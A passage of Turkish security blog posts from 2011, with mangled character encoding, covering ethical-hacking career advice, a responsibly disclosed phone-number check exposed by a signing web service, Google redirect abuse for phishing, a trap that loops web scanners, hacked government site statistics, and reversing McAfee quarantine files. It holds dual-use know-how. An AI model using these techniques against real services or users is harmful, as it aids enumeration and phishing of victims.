bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

